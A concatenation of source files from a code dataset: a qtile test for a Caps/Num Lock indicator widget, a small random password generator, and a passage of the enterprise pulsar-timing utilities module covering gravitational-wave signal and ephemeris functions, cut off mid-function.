# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Widget specific tests
import subprocess
from typing import List
import pytest
from libqtile.widget import caps_num_lock_indicator
from test.widgets.conftest import FakeBar
class MockCapsNumLockIndicator:
CalledProcessError = None
info: List[List[str]] = []
is_error = False
index = 0
@classmethod
def reset(cls):
cls.info = [
[
"Keyboard Control:",
" auto repeat: on key click percent: 0 LED mask: 00000002",
" XKB indicators:",
" 00: Caps Lock: off 01: Num Lock: on 02: Scroll Lock: off",
" 03: Compose: off 04: Kana: off 05: Sleep: off",
],
[
"Keyboard Control:",
" auto repeat: on key click percent: 0 LED mask: 00000002",
" XKB indicators:",
" 00: Caps Lock: on 01: Num Lock: on 02: Scroll Lock: off",
" 03: Compose: off 04: Kana: off 05: Sleep: off",
],
]
cls.index = 0
cls.is_error = False
@classmethod
def call_process(cls, cmd):
if cls.is_error:
raise subprocess.CalledProcessError(-1, cmd=cmd, output="Couldn't call xset.")
if cmd[1:] == ["q"]:
track = cls.info[cls.index]
output = "\n".join(track)
return output
def no_op(*args, **kwargs):
pass
@pytest.fixture
def patched_cnli(monkeypatch):
MockCapsNumLockIndicator.reset()
monkeypatch.setattr(
"libqtile.widget.caps_num_lock_indicator.subprocess", MockCapsNumLockIndicator
)
monkeypatch.setattr(
"libqtile.widget.caps_num_lock_indicator.subprocess.CalledProcessError",
subprocess.CalledProcessError,
)
monkeypatch.setattr(
"libqtile.widget.caps_num_lock_indicator.base.ThreadPoolText.call_process",
MockCapsNumLockIndicator.call_process,
)
return caps_num_lock_indicator
def test_cnli(fake_qtile, patched_cnli, fake_window):
widget = patched_cnli.CapsNumLockIndicator()
fakebar = FakeBar([widget], window=fake_window)
widget._configure(fake_qtile, fakebar)
text = widget.poll()
assert text == "Caps off Num on"
def test_cnli_caps_on(fake_qtile, patched_cnli, fake_window):
widget = patched_cnli.CapsNumLockIndicator()
# Simulate Caps on
MockCapsNumLockIndicator.index = 1
fakebar = FakeBar([widget], window=fake_window)
widget._configure(fake_qtile, fakebar)
text = widget.poll()
assert text == "Caps on Num on"
def test_cnli_error_handling(fake_qtile, patched_cnli, fake_window):
widget = patched_cnli.CapsNumLockIndicator()
# Simulate a CalledProcessError exception
MockCapsNumLockIndicator.is_error = True
fakebar = FakeBar([widget], window=fake_window)
widget._configure(fake_qtile, fakebar)
text = widget.poll()
# Widget does nothing with error message so text is blank
assert text == ""
| qtile/qtile | test/widgets/test_caps_num_lock_indicator.py | Python | mit | 4,137 |
import random
from string import digits, ascii_letters, punctuation
def password_generator(length):
    values = digits + ascii_letters + punctuation
    while True:
        yield ''.join(random.choice(values) for _ in range(length))
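# Illustrative usage sketch (an assumption, not part of the original file):
# each next() call yields a fresh random password of the requested length.
if __name__ == '__main__':
    passwords = password_generator(12)
    print(next(passwords))
    print(next(passwords))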
| id2669099/turbo-waffle | task_07_02.py | Python | mit | 249 |
# utils.py
"""
Utilities module containing various useful
functions for use in other modules.
"""
import logging
import numpy as np
import scipy.linalg as sl
import scipy.sparse as sps
import scipy.special as ss
from pkg_resources import Requirement, resource_filename
from scipy.integrate import odeint
from scipy.interpolate import interp1d
from sksparse.cholmod import cholesky
import enterprise
from enterprise import constants as const
from enterprise import signals as sigs # noqa: F401
from enterprise.signals.gp_bases import ( # noqa: F401
createfourierdesignmatrix_dm,
createfourierdesignmatrix_env,
createfourierdesignmatrix_eph,
createfourierdesignmatrix_ephem,
createfourierdesignmatrix_red,
)
from enterprise.signals.gp_priors import powerlaw, turnover # noqa: F401
from enterprise.signals.parameter import function
logger = logging.getLogger(__name__)
def get_coefficients(pta, params, n=1, phiinv_method="cliques", common_sparse=False):
ret = []
TNrs = pta.get_TNr(params)
TNTs = pta.get_TNT(params)
phiinvs = pta.get_phiinv(params, logdet=False, method=phiinv_method)
# ...repeated code in the two if branches... refactor at will!
if pta._commonsignals:
if common_sparse:
Sigma = sps.block_diag(TNTs, "csc") + sps.csc_matrix(phiinvs)
TNr = np.concatenate(TNrs)
ch = cholesky(Sigma)
mn = ch(TNr)
Li = sps.linalg.inv(ch.L()).toarray()
else:
Sigma = sl.block_diag(*TNTs) + phiinvs
TNr = np.concatenate(TNrs)
u, s, _ = sl.svd(Sigma)
mn = np.dot(u, np.dot(u.T, TNr) / s)
Li = u * np.sqrt(1 / s)
for j in range(n):
b = mn + np.dot(Li, np.random.randn(Li.shape[0]))
pardict, ntot = {}, 0
for i, model in enumerate(pta.pulsarmodels):
for sig in model._signals:
if sig.signal_type in ["basis", "common basis"]:
nb = sig.get_basis(params=params).shape[1]
if nb + ntot > len(b):
raise IndexError(
"Missing some parameters! " "You need to disable GP " "basis column reuse."
)
pardict[sig.name + "_coefficients"] = b[ntot : nb + ntot]
ntot += nb
if len(ret) <= j:
ret.append(params.copy())
ret[j].update(pardict)
return ret[0] if n == 1 else ret
else:
for i, model in enumerate(pta.pulsarmodels):
phiinv, d, TNT = phiinvs[i], TNrs[i], TNTs[i]
Sigma = TNT + (np.diag(phiinv) if phiinv.ndim == 1 else phiinv)
try:
u, s, _ = sl.svd(Sigma)
mn = np.dot(u, np.dot(u.T, d) / s)
Li = u * np.sqrt(1 / s)
except np.linalg.LinAlgError:
Q, R = sl.qr(Sigma)
Sigi = sl.solve(R, Q.T)
mn = np.dot(Sigi, d)
u, s, _ = sl.svd(Sigi)
Li = u * np.sqrt(1 / s)
for j in range(n):
b = mn + np.dot(Li, np.random.randn(Li.shape[0]))
pardict, ntot = {}, 0
for sig in model._signals:
if sig.signal_type == "basis":
nb = sig.get_basis(params=params).shape[1]
if nb + ntot > len(b):
raise IndexError(
"Missing some parameters! " "You need to disable GP " "basis column reuse."
)
pardict[sig.name + "_coefficients"] = b[ntot : nb + ntot]
ntot += nb
if len(ret) <= j:
ret.append(params.copy())
ret[j].update(pardict)
return ret[0] if n == 1 else ret
class KernelMatrix(np.ndarray):
def __new__(cls, init):
if isinstance(init, int):
ret = np.zeros(init, "d").view(cls)
else:
ret = init.view(cls)
if ret.ndim == 2:
ret._cliques = -1 * np.ones(ret.shape[0])
ret._clcount = 0
return ret
# see PTA._setcliques
def _setcliques(self, idxs):
allidx = set(self._cliques[idxs])
maxidx = max(allidx)
if maxidx == -1:
self._cliques[idxs] = self._clcount
self._clcount = self._clcount + 1
else:
self._cliques[idxs] = maxidx
if len(allidx) > 1:
self._cliques[np.in1d(self._cliques, allidx)] = maxidx
def add(self, other, idx):
if other.ndim == 2 and self.ndim == 1:
self = KernelMatrix(np.diag(self))
if self.ndim == 1:
self[idx] += other
else:
if other.ndim == 1:
self[idx, idx] += other
else:
self._setcliques(idx)
idx = (idx, idx) if isinstance(idx, slice) else (idx[:, None], idx)
self[idx] += other
return self
def set(self, other, idx):
if other.ndim == 2 and self.ndim == 1:
self = KernelMatrix(np.diag(self))
if self.ndim == 1:
self[idx] = other
else:
if other.ndim == 1:
self[idx, idx] = other
else:
self._setcliques(idx)
idx = (idx, idx) if isinstance(idx, slice) else (idx[:, None], idx)
self[idx] = other
return self
def inv(self, logdet=False):
if self.ndim == 1:
inv = 1.0 / self
if logdet:
return inv, np.sum(np.log(self))
else:
return inv
else:
try:
cf = sl.cho_factor(self)
inv = sl.cho_solve(cf, np.identity(cf[0].shape[0]))
if logdet:
ld = 2.0 * np.sum(np.log(np.diag(cf[0])))
except np.linalg.LinAlgError:
u, s, v = np.linalg.svd(self)
inv = np.dot(u / s, u.T)
if logdet:
ld = np.sum(np.log(s))
if logdet:
return inv, ld
else:
return inv
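# Illustrative sketch (not part of the enterprise API): KernelMatrix stores a
# diagonal kernel as a 1-d array and a dense kernel as a 2-d array. For the
# 1-d case, inv() is an element-wise reciprocal and the log-determinant is the
# sum of the logs of the diagonal entries.
def _example_kernelmatrix_inv():
    K = KernelMatrix(3)                            # zero-initialized 1-d (diagonal) kernel
    K = K.add(np.array([1.0, 2.0, 4.0]), slice(0, 3))
    return K.inv(logdet=True)                      # (array([1., 0.5, 0.25]), log(8) ~ 2.079)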
def create_stabletimingdesignmatrix(designmat, fastDesign=True):
"""
Stabilize the timing-model design matrix.
:param designmat: Pulsar timing model design matrix
:param fastDesign: Stabilize the design matrix the fast way [True]
:return: Mm: Stabilized timing model design matrix
"""
Mm = designmat.copy()
if fastDesign:
norm = np.sqrt(np.sum(Mm ** 2, axis=0))
Mm /= norm
else:
u, s, v = np.linalg.svd(Mm)
Mm = u[:, : len(s)]
return Mm
###################################
# Deterministic GW signal functions
###################################
def make_ecc_interpolant():
"""
Make interpolation function from eccentricity file to
determine number of harmonics to use for a given
eccentricity.
:returns: interpolant
"""
pth = resource_filename(Requirement.parse("libstempo"), "libstempo/ecc_vs_nharm.txt")
fil = np.loadtxt(pth)
return interp1d(fil[:, 0], fil[:, 1])
def get_edot(F, mc, e):
"""
Compute eccentricity derivative from Taylor et al. (2016)
:param F: Orbital frequency [Hz]
:param mc: Chirp mass of binary [Solar Mass]
:param e: Eccentricity of binary
:returns: de/dt
"""
# chirp mass
mc *= const.Tsun
dedt = -304 / (15 * mc) * (2 * np.pi * mc * F) ** (8 / 3) * e * (1 + 121 / 304 * e ** 2) / ((1 - e ** 2) ** (5 / 2))
return dedt
def get_Fdot(F, mc, e):
"""
Compute frequency derivative from Taylor et al. (2016)
:param F: Orbital frequency [Hz]
:param mc: Chirp mass of binary [Solar Mass]
:param e: Eccentricity of binary
:returns: dF/dt
"""
# chirp mass
mc *= const.Tsun
dFdt = (
48
/ (5 * np.pi * mc ** 2)
* (2 * np.pi * mc * F) ** (11 / 3)
* (1 + 73 / 24 * e ** 2 + 37 / 96 * e ** 4)
/ ((1 - e ** 2) ** (7 / 2))
)
return dFdt
def get_gammadot(F, mc, q, e):
"""
Compute gamma dot from Barack and Cutler (2004)
:param F: Orbital frequency [Hz]
:param mc: Chirp mass of binary [Solar Mass]
:param q: Mass ratio of binary
:param e: Eccentricity of binary
:returns: dgamma/dt
"""
# chirp mass
mc *= const.Tsun
# total mass
m = (((1 + q) ** 2) / q) ** (3 / 5) * mc
dgdt = (
6
* np.pi
* F
* (2 * np.pi * F * m) ** (2 / 3)
/ (1 - e ** 2)
* (1 + 0.25 * (2 * np.pi * F * m) ** (2 / 3) / (1 - e ** 2) * (26 - 15 * e ** 2))
)
return dgdt
def get_coupled_constecc_eqns(y, t, mc, e0):
"""
Computes the coupled system of differential
equations from Peters (1964) and Barack &
    Cutler (2004). This is a system of two variables:
F: Orbital frequency [Hz]
phase0: Orbital phase [rad]
    :param y: Vector of input parameters [F, phase]
:param t: Time [s]
:param mc: Chirp mass of binary [Solar Mass]
:returns: array of derivatives [dF/dt, dphase/dt]
"""
F = y[0]
dFdt = get_Fdot(F, mc, e0)
dphasedt = 2 * np.pi * F
return np.array([dFdt, dphasedt])
def get_coupled_ecc_eqns(y, t, mc, q):
"""
Computes the coupled system of differential
equations from Peters (1964) and Barack &
    Cutler (2004). This is a system of four variables:
F: Orbital frequency [Hz]
e: Orbital eccentricity
gamma: Angle of precession of periastron [rad]
phase0: Orbital phase [rad]
    :param y: Vector of input parameters [F, e, gamma, phase]
:param t: Time [s]
:param mc: Chirp mass of binary [Solar Mass]
:param q: Mass ratio of binary
:returns: array of derivatives [dF/dt, de/dt, dgamma/dt, dphase/dt]
"""
F = y[0]
e = y[1]
dFdt = get_Fdot(F, mc, e)
dedt = get_edot(F, mc, e)
dgdt = get_gammadot(F, mc, q, e)
dphasedt = 2 * np.pi * F
return np.array([dFdt, dedt, dgdt, dphasedt])
def solve_coupled_constecc_solution(F0, e0, phase0, mc, t):
"""
Compute the solution to the coupled system of equations
    from Peters (1964) and Barack & Cutler (2004) at
a given time.
    :param F0: Initial orbital frequency [Hz]
    :param e0: Constant orbital eccentricity
    :param phase0: Initial orbital phase [rad]
    :param mc: Chirp mass of binary [Solar Mass]
:param t: Time at which to evaluate solution [s]
:returns: (F(t), phase(t))
"""
y0 = np.array([F0, phase0])
y, infodict = odeint(get_coupled_constecc_eqns, y0, t, args=(mc, e0), full_output=True)
if infodict["message"] == "Integration successful.":
ret = y
else:
ret = 0
return ret
def solve_coupled_ecc_solution(F0, e0, gamma0, phase0, mc, q, t):
"""
Compute the solution to the coupled system of equations
    from Peters (1964) and Barack & Cutler (2004) at
a given time.
:param F0: Initial orbital frequency [Hz]
:param e0: Initial orbital eccentricity
    :param gamma0: Initial angle of precession of periastron [rad]
    :param phase0: Initial orbital phase [rad]
:param mc: Chirp mass of binary [Solar Mass]
:param q: Mass ratio of binary
:param t: Time at which to evaluate solution [s]
:returns: (F(t), e(t), gamma(t), phase(t))
"""
y0 = np.array([F0, e0, gamma0, phase0])
y, infodict = odeint(get_coupled_ecc_eqns, y0, t, args=(mc, q), full_output=True)
if infodict["message"] == "Integration successful.":
ret = y
else:
ret = 0
return ret
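# Illustrative usage sketch (values are arbitrary assumptions, not part of the
# enterprise API): integrate the orbital evolution of an eccentric binary over
# one year, sampled monthly. Columns of the result are (F [Hz], e, gamma [rad],
# phase [rad]) at each requested time, or 0 if the integration fails.
def _example_ecc_evolution():
    t = np.linspace(0.0, 365.25 * 86400.0, 12)
    return solve_coupled_ecc_solution(F0=1e-8, e0=0.3, gamma0=0.0, phase0=0.0,
                                      mc=1e9, q=0.25, t=t)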
def get_an(n, mc, dl, h0, F, e):
"""
Compute a_n from Eq. 22 of Taylor et al. (2016).
:param n: Harmonic number
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:returns: a_n
"""
# convert to seconds
mc *= const.Tsun
dl *= const.Mpc / const.c
omega = 2 * np.pi * F
if h0 is None:
amp = n * mc ** (5 / 3) * omega ** (2 / 3) / dl
elif h0 is not None:
amp = n * h0 / 2.0
ret = -amp * (
ss.jn(n - 2, n * e)
- 2 * e * ss.jn(n - 1, n * e)
+ (2 / n) * ss.jn(n, n * e)
+ 2 * e * ss.jn(n + 1, n * e)
- ss.jn(n + 2, n * e)
)
return ret
def get_bn(n, mc, dl, h0, F, e):
"""
    Compute b_n from Eq. 22 of Taylor et al. (2016).
:param n: Harmonic number
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:returns: b_n
"""
# convert to seconds
mc *= const.Tsun
dl *= const.Mpc / const.c
omega = 2 * np.pi * F
if h0 is None:
amp = n * mc ** (5 / 3) * omega ** (2 / 3) / dl
elif h0 is not None:
amp = n * h0 / 2.0
ret = -amp * np.sqrt(1 - e ** 2) * (ss.jn(n - 2, n * e) - 2 * ss.jn(n, n * e) + ss.jn(n + 2, n * e))
return ret
def get_cn(n, mc, dl, h0, F, e):
"""
Compute c_n from Eq. 22 of Taylor et al. (2016).
:param n: Harmonic number
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:returns: c_n
"""
# convert to seconds
mc *= const.Tsun
dl *= const.Mpc / const.c
omega = 2 * np.pi * F
if h0 is None:
amp = 2 * mc ** (5 / 3) * omega ** (2 / 3) / dl
elif h0 is not None:
amp = h0
ret = amp * ss.jn(n, n * e) / (n * omega)
return ret
def calculate_splus_scross(nmax, mc, dl, h0, F, e, t, l0, gamma, gammadot, inc):
"""
Calculate splus and scross for a CGW summed over all harmonics.
This waveform differs slightly from that in Taylor et al (2016)
in that it includes the time dependence of the advance of periastron.
:param nmax: Total number of harmonics to use
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:param t: TOAs [s]
:param l0: Initial eccentric anomoly [rad]
:param gamma: Angle of periastron advance [rad]
:param gammadot: Time derivative of angle of periastron advance [rad/s]
:param inc: Inclination angle [rad]
:return splus, scross: plus and cross time-domain waveforms for a CGW
"""
n = np.arange(1, nmax)
# time dependent amplitudes
an = get_an(n, mc, dl, h0, F, e)
bn = get_bn(n, mc, dl, h0, F, e)
cn = get_cn(n, mc, dl, h0, F, e)
# time dependent terms
omega = 2 * np.pi * F
gt = gamma + gammadot * t
lt = l0 + omega * t
# tiled phase
phase1 = n * np.tile(lt, (nmax - 1, 1)).T
phase2 = np.tile(gt, (nmax - 1, 1)).T
sinp1 = np.sin(phase1)
cosp1 = np.cos(phase1)
sinp2 = np.sin(2 * phase2)
cosp2 = np.cos(2 * phase2)
sinpp = sinp1 * cosp2 + cosp1 * sinp2
cospp = cosp1 * cosp2 - sinp1 * sinp2
sinpm = sinp1 * cosp2 - cosp1 * sinp2
cospm = cosp1 * cosp2 + sinp1 * sinp2
# intermediate terms
sp = sinpm / (n * omega - 2 * gammadot) + sinpp / (n * omega + 2 * gammadot)
sm = sinpm / (n * omega - 2 * gammadot) - sinpp / (n * omega + 2 * gammadot)
cp = cospm / (n * omega - 2 * gammadot) + cospp / (n * omega + 2 * gammadot)
cm = cospm / (n * omega - 2 * gammadot) - cospp / (n * omega + 2 * gammadot)
splus_n = -0.5 * (1 + np.cos(inc) ** 2) * (an * sp - bn * sm) + (1 - np.cos(inc) ** 2) * cn * sinp1
scross_n = np.cos(inc) * (an * cm - bn * cp)
return np.sum(splus_n, axis=1), np.sum(scross_n, axis=1)
def create_gw_antenna_pattern(pos, gwtheta, gwphi):
"""
Function to create pulsar antenna pattern functions as defined
in Ellis, Siemens, and Creighton (2012).
:param pos: Unit vector from Earth to pulsar
:param gwtheta: GW polar angle in radians
:param gwphi: GW azimuthal angle in radians
:return: (fplus, fcross, cosMu), where fplus and fcross
are the plus and cross antenna pattern functions
and cosMu is the cosine of the angle between the
pulsar and the GW source.
"""
# use definition from Sesana et al 2010 and Ellis et al 2012
m = np.array([np.sin(gwphi), -np.cos(gwphi), 0.0])
n = np.array([-np.cos(gwtheta) * np.cos(gwphi), -np.cos(gwtheta) * np.sin(gwphi), np.sin(gwtheta)])
omhat = np.array([-np.sin(gwtheta) * np.cos(gwphi), -np.sin(gwtheta) * np.sin(gwphi), -np.cos(gwtheta)])
fplus = 0.5 * (np.dot(m, pos) ** 2 - np.dot(n, pos) ** 2) / (1 + np.dot(omhat, pos))
fcross = (np.dot(m, pos) * np.dot(n, pos)) / (1 + np.dot(omhat, pos))
cosMu = -np.dot(omhat, pos)
return fplus, fcross, cosMu
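# Illustrative sketch (example geometry is an assumption, not part of the
# enterprise API): antenna pattern for a pulsar along the x axis and a GW
# source at the celestial pole; cosMu is the cosine of the pulsar-source angle.
def _example_antenna_pattern():
    pos = np.array([1.0, 0.0, 0.0])  # unit vector from Earth to pulsar
    # For gwtheta = gwphi = 0 this returns (fplus, fcross, cosMu) = (-0.5, 0.0, 0.0).
    return create_gw_antenna_pattern(pos, 0.0, 0.0)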
@function
def bwm_delay(toas, pos, log10_h=-14.0, cos_gwtheta=0.0, gwphi=0.0, gwpol=0.0, t0=55000, antenna_pattern_fn=None):
"""
Function that calculates the earth-term gravitational-wave
burst-with-memory signal, as described in:
    Seto et al., van Haasteren and Levin, Pshirkov et al., Cordes and Jenet.
This version uses the F+/Fx polarization modes, as verified with the
Continuous Wave and Anisotropy papers.
:param toas: Time-of-arrival measurements [s]
:param pos: Unit vector from Earth to pulsar
:param log10_h: log10 of GW strain
:param cos_gwtheta: Cosine of GW polar angle
:param gwphi: GW azimuthal polar angle [rad]
:param gwpol: GW polarization angle
:param t0: Burst central time [day]
:param antenna_pattern_fn:
User defined function that takes `pos`, `gwtheta`, `gwphi` as
arguments and returns (fplus, fcross)
:return: the waveform as induced timing residuals (seconds)
"""
# convert
h = 10 ** log10_h
gwtheta = np.arccos(cos_gwtheta)
t0 *= const.day
# antenna patterns
if antenna_pattern_fn is None:
apc = create_gw_antenna_pattern(pos, gwtheta, gwphi)
else:
apc = antenna_pattern_fn(pos, gwtheta, gwphi)
# grab fplus, fcross
fp, fc = apc[0], apc[1]
# combined polarization
pol = np.cos(2 * gwpol) * fp + np.sin(2 * gwpol) * fc
# Return the time-series for the pulsar
return pol * h * np.heaviside(toas - t0, 0.5) * (toas - t0)
@function
def create_quantization_matrix(toas, dt=1, nmin=2):
"""Create quantization matrix mapping TOAs to observing epochs."""
isort = np.argsort(toas)
bucket_ref = [toas[isort[0]]]
bucket_ind = [[isort[0]]]
for i in isort[1:]:
if toas[i] - bucket_ref[-1] < dt:
bucket_ind[-1].append(i)
else:
bucket_ref.append(toas[i])
bucket_ind.append([i])
# find only epochs with more than 1 TOA
bucket_ind2 = [ind for ind in bucket_ind if len(ind) >= nmin]
U = np.zeros((len(toas), len(bucket_ind2)), "d")
for i, l in enumerate(bucket_ind2):
U[l, i] = 1
weights = np.ones(U.shape[1])
return U, weights
def quant2ind(U):
"""
Use quantization matrix to return slices of non-zero elements.
:param U: quantization matrix
:return: list of `slice`s for non-zero elements of U
.. note:: This function assumes that the pulsar TOAs were sorted by time.
"""
inds = []
for cc, col in enumerate(U.T):
epinds = np.flatnonzero(col)
if epinds[-1] - epinds[0] + 1 != len(epinds):
raise ValueError("ERROR: TOAs not sorted properly!")
inds.append(slice(epinds[0], epinds[-1] + 1))
return inds
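# Worked example (illustrative comment, not from the enterprise source): with
# sorted TOAs at [0, 10, 20, 86405, 86410] seconds and dt = 86400 (one day),
# create_quantization_matrix returns a (5, 2) matrix U: column 0 flags the
# first three TOAs (epoch 0) and column 1 the last two (epoch 1), so
# quant2ind(U) yields [slice(0, 3), slice(3, 5)].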
def linear_interp_basis(toas, dt=30 * 86400):
"""Provides a basis for linear interpolation.
:param toas: Pulsar TOAs in seconds
:param dt: Linear interpolation step size in seconds.
:returns: Linear interpolation basis and nodes
"""
# evenly spaced points
x = np.arange(toas.min(), toas.max() + dt, dt)
M = np.zeros((len(toas), len(x)))
# make linear interpolation basis
for ii in range(len(x) - 1):
idx = np.logical_and(toas >= x[ii], toas <= x[ii + 1])
M[idx, ii] = (toas[idx] - x[ii + 1]) / (x[ii] - x[ii + 1])
M[idx, ii + 1] = (toas[idx] - x[ii]) / (x[ii + 1] - x[ii])
# only return non-zero columns
idx = M.sum(axis=0) != 0
return M[:, idx], x[idx]
# overlap reduction functions
@function
def hd_orf(pos1, pos2):
"""Hellings & Downs spatial correlation function."""
if np.all(pos1 == pos2):
return 1
else:
omc2 = (1 - np.dot(pos1, pos2)) / 2
return 1.5 * omc2 * np.log(omc2) - 0.25 * omc2 + 0.5
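# Illustrative sketch (not part of the enterprise API): the same Hellings &
# Downs expression evaluated at an arbitrary angular separation. At 90 degrees
# omc2 = 0.5, giving 1.5*0.5*log(0.5) - 0.25*0.5 + 0.5 ~= -0.145.
def _example_hd_curve(zeta):
    """Evaluate the Hellings & Downs curve at angular separation zeta [rad]."""
    omc2 = (1 - np.cos(zeta)) / 2
    return 1.5 * omc2 * np.log(omc2) - 0.25 * omc2 + 0.5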
@function
def dipole_orf(pos1, pos2):
"""Dipole spatial correlation function."""
if np.all(pos1 == pos2):
return 1 + 1e-5
else:
return np.dot(pos1, pos2)
@function
def monopole_orf(pos1, pos2):
"""Monopole spatial correlation function."""
if np.all(pos1 == pos2):
return 1.0 + 1e-5
else:
return 1.0
@function
def anis_orf(pos1, pos2, params, **kwargs):
"""Anisotropic GWB spatial correlation function."""
anis_basis = kwargs["anis_basis"]
psrs_pos = kwargs["psrs_pos"]
lmax = kwargs["lmax"]
psr1_index = [ii for ii in range(len(psrs_pos)) if np.all(psrs_pos[ii] == pos1)][0]
psr2_index = [ii for ii in range(len(psrs_pos)) if np.all(psrs_pos[ii] == pos2)][0]
clm = np.zeros((lmax + 1) ** 2)
clm[0] = 2.0 * np.sqrt(np.pi)
if lmax > 0:
clm[1:] = params
return sum(clm[ii] * basis for ii, basis in enumerate(anis_basis[: (lmax + 1) ** 2, psr1_index, psr2_index]))
@function
def unnormed_tm_basis(Mmat):
return Mmat, np.ones_like(Mmat.shape[1])
@function
def normed_tm_basis(Mmat, norm=None):
if norm is None:
norm = np.sqrt(np.sum(Mmat ** 2, axis=0))
nmat = Mmat / norm
nmat[:, norm == 0] = 0
return nmat, np.ones_like(Mmat.shape[1])
@function
def svd_tm_basis(Mmat):
u, s, v = np.linalg.svd(Mmat, full_matrices=False)
return u, np.ones_like(s)
@function
def tm_prior(weights):
return weights * 1e40
# Physical ephemeris model utility functions
def get_planet_orbital_elements(model="setIII"):
"""Grab physical ephemeris model files"""
dpath = enterprise.__path__[0] + "/datafiles/ephemeris/"
return (
np.load(dpath + "/jupiter-" + model + "-mjd.npy"),
np.load(dpath + "/jupiter-" + model + "-xyz-svd.npy"),
np.load(dpath + "/saturn-" + model + "-xyz-svd.npy"),
)
def ecl2eq_vec(x):
"""
Rotate (n,3) vector time series from ecliptic to equatorial.
"""
M_ecl = const.M_ecl
return np.einsum("jk,ik->ij", M_ecl, x)
def eq2ecl_vec(x):
"""
Rotate (n,3) vector time series from equatorial to ecliptic.
"""
M_ecl = const.M_ecl
return np.einsum("kj,ik->ij", M_ecl, x)
def euler_vec(z, y, x, n):
"""
Return (n,3,3) tensor with each (3,3) block containing an
Euler rotation with angles z, y, x. Optionally each of z, y, x
can be a vector of length n.
"""
L = np.zeros((n, 3, 3), "d")
cosx, sinx = np.cos(x), np.sin(x)
L[:, 0, 0] = 1
L[:, 1, 1] = L[:, 2, 2] = cosx
L[:, 1, 2] = -sinx
L[:, 2, 1] = sinx
N = np.zeros((n, 3, 3), "d")
cosy, siny = np.cos(y), np.sin(y)
N[:, 0, 0] = N[:, 2, 2] = cosy
N[:, 1, 1] = 1
N[:, 0, 2] = siny
N[:, 2, 0] = -siny
ret = np.einsum("ijk,ikl->ijl", L, N)
M = np.zeros((n, 3, 3), "d")
cosz, sinz = np.cos(z), np.sin(z)
M[:, 0, 0] = M[:, 1, 1] = cosz
M[:, 0, 1] = -sinz
M[:, 1, 0] = sinz
M[:, 2, 2] = 1
ret = np.einsum("ijk,ikl->ijl", ret, M)
return ret
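# Illustrative sketch (not part of the enterprise API): euler_vec builds one
# 3x3 rotation matrix per epoch. A pure z-rotation by 90 degrees maps the x
# unit vector onto the y axis.
def _example_euler_vec():
    E = euler_vec(np.pi / 2, 0.0, 0.0, 1)  # shape (1, 3, 3)
    return np.einsum("ijk,k->ij", E, np.array([1.0, 0.0, 0.0]))  # ~ [[0., 1., 0.]]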
def ss_framerotate(mjd, planet, x, y, z, dz, offset=None, equatorial=False):
"""
Rotate planet trajectory given as (n,3) tensor,
by ecliptic Euler angles x, y, z, and by z rate
dz. The rate has units of rad/year, and is referred
to offset 2010/1/1. dates must be given in MJD.
"""
t_offset = 55197.0 # MJD 2010/01/01
if equatorial:
planet = eq2ecl_vec(planet)
E = euler_vec(z + dz * (mjd - t_offset) / 365.25, y, x, planet.shape[0])
planet = np.einsum("ijk,ik->ij", E, planet)
if offset is not None:
planet = np.array(offset) + planet
if equatorial:
planet = ecl2eq_vec(planet)
return planet
def dmass(planet, dm_over_Msun):
return dm_over_Msun * planet
@function
def physicalephem_spectrum(sigmas):
# note the creative use of the "labels" (the very sigmas, not frequencies)
return sigmas ** 2
@function
def createfourierdesignmatrix_physicalephem(
toas,
planetssb,
pos_t,
frame_drift_rate=1e-9,
d_jupiter_mass=1.54976690e-11,
d_saturn_mass=8.17306184e-12,
d_uranus_mass=5.71923361e-11,
d_neptune_mass=7.96103855e-11,
jup_orb_elements=0.05,
sat_orb_elements=0.5,
model="setIII",
):
"""
Construct physical ephemeris perturbation design matrix and 'frequencies'.
Parameters can be excluded by setting the corresponding prior sigma to None
    :param toas: vector of TOAs in seconds
    :param planetssb: array of planet positions relative to the SSB (per TOA)
    :param pos_t: pulsar position as Cartesian unit vector (per TOA)
:param frame_drift_rate: normal sigma for frame drift rate
:param d_jupiter_mass: normal sigma for Jupiter mass perturbation
:param d_saturn_mass: normal sigma for Saturn mass perturbation
:param d_uranus_mass: normal sigma for Uranus mass perturbation
:param d_neptune_mass: normal sigma for Neptune mass perturbation
:param jup_orb_elements: normal sigma for Jupiter orbital elem. perturb.
:param sat_orb_elements: normal sigma for Saturn orbital elem. perturb.
:param model: vector basis used by Jupiter and Saturn perturb.;
see PhysicalEphemerisSignal, defaults to "setIII"
:return: F: Fourier design matrix of shape (len(toas), nvecs)
:return: sigmas: Phi sigmas (nvecs, to be passed to physicalephem_spectrum)
"""
# Jupiter + Saturn orbit definitions that we pass to physical_ephem_delay
oa = {}
(oa["times"], oa["jup_orbit"], oa["sat_orbit"]) = get_planet_orbital_elements(model)
dpar = 1e-5 # may need finessing
Fl, Phil = [], []
for parname in [
"frame_drift_rate",
"d_jupiter_mass",
"d_saturn_mass",
"d_uranus_mass",
"d_neptune_mass",
"jup_orb_elements",
"sat_orb_elements",
]:
ppar = locals()[parname]
if ppar:
if parname not in ["jup_orb_elements", "sat_orb_elements"]:
# need to normalize?
Fl.append(physical_ephem_delay(toas, planetssb, pos_t, **{parname: dpar}) / dpar)
Phil.append(ppar)
else:
for i in range(6):
c = np.zeros(6)
c[i] = dpar
# Fl.append(physical_ephem_delay(toas, planetssb, pos_t,
# **{parname: c}, **oa)/dpar)
kwarg_dict = {parname: c}
kwarg_dict.update(oa)
Fl.append(physical_ephem_delay(toas, planetssb, pos_t, **kwarg_dict) / dpar)
Phil.append(ppar)
return np.array(Fl).T.copy(), np.array(Phil)
@function
def physical_ephem_delay(
toas,
